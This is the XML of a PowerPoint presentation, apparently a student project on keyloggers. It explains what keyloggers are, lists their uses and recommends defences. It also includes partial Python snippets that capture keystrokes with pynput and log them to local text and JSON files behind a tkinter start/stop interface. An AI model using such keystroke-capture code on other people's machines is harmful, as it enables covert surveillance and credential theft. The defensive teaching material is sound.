            </a:b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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" b="0" spc="5" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:rPr>
              <a:t>By employers to observe employees computer activities.</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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" b="0" spc="5" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:rPr>
              <a:t>By parents to supervise their children's internet usage.</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3. B</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" b="0" spc="5" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:rPr>
              <a:t>y device owners to track possible unauthorized activity on their </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    </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" b="0" spc="5" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:rPr>
              <a:t>devices.</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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" b="0" spc="5" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:rPr>
              <a:t>By law enforcement agencies to analyze incidents involving computer </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    u</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" b="0" spc="5" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:rPr>
              <a:t>se.</a:t>
            </a:r>
            <a:endParaRPr sz="1900" b="0" spc="5" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"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681605" y="185420"/>
            <a:ext cx="8209915" cy="6479540"/>
          </a:xfrm>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br>
              <a:rPr sz="3600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr sz="1900" b="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:rPr>
              <a:t>While visual inspection can identify hardware keyloggers, it is impractical and time-consuming to implement on a large scale. Instead, using a firewall can provide better protection by discovering and preventing the transfer of keystroke information from the victim's keyboard to the attacker.</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900" b="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr sz="1900" b="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr sz="1900" b="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:rPr>
              <a:t>Password managers that automatically fill in username and password fields can help protect against keyloggers. Monitoring software and antivirus software can also keep track of a system's health and help prevent keyloggers.</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900" b="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr sz="3600" b="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" b="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:rPr>
              <a:t>xtra precautions include using a security token as part of two-factor authentication to ensure an attacker cannot use a stolen password alone to log in to a user's account, or using an onscreen keyboard and voice-to-text software to circumvent using a physical keyboard. Application allow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" b="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:rPr>
              <a:t>listing can also be used to allow only documented, authorized programs to run on a system.</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900" b="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1900" b="0" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:cs typeface="Calibri" panose="020F050202020403020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897745" y="9836785"/>
            <a:ext cx="1756410" cy="14930120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16510" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>import tkinter as tk</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
              <a:t>listener.stop()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
              <a:t>    label.config(text="Keylogger stopped.")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
              <a:t>    start_button.config(state='normal')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
              <a:t>    stop_button.config(state='disabled')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
              <a:t>root = Tk()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
              <a:t>root.title("Keylogger")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
              <a:t>label = Label(root, text='Click "Start" to begin keylogging.')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
              <a:t>label.config(anchor=CENTER)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
              <a:t>label.pack()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
              <a:t>start_button = Button(root, text="Start", command=start_keylogger)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
              <a:t>start_button.pack(side=LEFT)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
              <a:t>stop_button = Button(root, text="Stop", command=stop_keylogger, state='disabled')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
              <a:t>stop_button.pack(side=RIGHT)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
              <a:t>root.geometry("250x250")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:noFill/>
              </a:rPr>
              <a:t>root.mainloop()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000">
              <a:no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5" name="Text Box 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="64135"/>
            <a:ext cx="7837170" cy="6668770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1"/>
              <a:t>CODING SNIPPETS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>import tkinter as tk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>from tkinter import *</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>from pynput import keyboard</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>import json</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>keys_used = []</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>flag = False</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>keys = ""</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>def generate_text_log(key):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>    with open('key_log.txt', "w+") as keys:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>        keys.write(key)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>def generate_json_file(keys_used):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>    with open('key_log.json', '+wb') as key_log:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>        key_list_bytes = json.dumps(keys_used).encode()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>        key_log.write(key_list_bytes)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>def on_press(key):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>    global flag, keys_used, keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>    if flag == False:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>        keys_used.append(</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>            {'Pressed': f'{key}'}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>          )</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>        </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>        </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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6543</Words>
  <Application>WPS Presentation</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>175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Trebuchet MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>                          PREETI SUNAR</vt:lpstr>
      <vt:lpstr>KEYLOGGER &amp; SECURITY</vt:lpstr>
      <vt:lpstr>AGENDA</vt:lpstr>
      <vt:lpstr>              What is keylogger?  1. A keylogger, sometimes called a keystroke logger, is a type of surveillance technology or a particularly insidious type of spyware that can record and steal consecutive keystrokes (and much more) that the user enters on a device.  2. It can be either hardware or software-based.   3. Such systems are also highly useful for law enforcement and espionage. </vt:lpstr>
      <vt:lpstr>KEYLOGGER TYPES</vt:lpstr>
      <vt:lpstr>PROJECT	OVERVIEW  A key logger is a software that records keystrokes or keys that you press on a keyboard.Passwords,credit cards,numbers,confidential messages and other information are at risk of being recorded and retrieved by a cybercriminal when you type them on a keyboard of a compromised computer.A key logger basically position itself between  the keyboard of a compromised computer.These applications has various features,such as taking recording audio output, occasional screenshots,monitoring active apps and visited websites and so on.Hackers can distribute a keylogger on peer-to-peer networks or include one as a file attachment to a phishing email.</vt:lpstr>
      <vt:lpstr>WHO ARE THE END USERS?  Keyloggers are often used as a spyware tool by cybercriminals to steal personally identifiable information, login credentials and sensitive enterprise data.  That said, some uses of keyloggers could be considered ethical or appropriate in varying degrees. For instance, keyloggers can also be used for the following reasons:  1. By employers to observe employees computer activities. 2. By parents to supervise their children's internet usage. 3. By device owners to track possible unauthorized activity on their      devices. 4. By law enforcement agencies to analyze incidents involving computer      use.</vt:lpstr>
      <vt:lpstr>YOUR SOLUTION AND ITS VALUE PROPOSITION  While visual inspection can identify hardware keyloggers, it is impractical and time-consuming to implement on a large scale. Instead, using a firewall can provide better protection by discovering and preventing the transfer of keystroke information from the victim's keyboard to the attacker.  Password managers that automatically fill in username and password fields can help protect against keyloggers. Monitoring software and antivirus software can also keep track of a system's health and help prevent keyloggers.  Extra precautions include using a security token as part of two-factor authentication to ensure an attacker cannot use a stolen password alone to log in to a user's account, or using an onscreen keyboard and voice-to-text software to circumvent using a physical keyboard. Application allow listing can also be used to allow only documented, authorized programs to run on a system. </vt:lpstr>
      <vt:lpstr>import tkinter as tk listener.stop()     label.config(text="Keylogger stopped.")     start_button.config(state='normal')     stop_button.config(state='disabled')  root = Tk() root.title("Keylogger")  label = Label(root, text='Click "Start" to begin keylogging.') label.config(anchor=CENTER) label.pack()  start_button = Button(root, text="Start", command=start_keylogger) start_button.pack(side=LEFT)  stop_button = Button(root, text="Stop", command=stop_keylogger, state='disabled') stop_button.pack(side=RIGHT)  root.geometry("250x250")  root.mainloop()</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</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Preeti Sunar</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-03T05:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-17T12:48:07Z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2024-03-21T17:15:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="LastSaved">
    <vt:filetime>2024-06-03T17:15:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>FBB5CE775DD24D29AF08D08CB6F1D2A1_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="KSOProductBuildVer">
    <vt:lpwstr>1033-12.2.0.13472</vt:lpwstr>
  </property>
</Properties>
</file>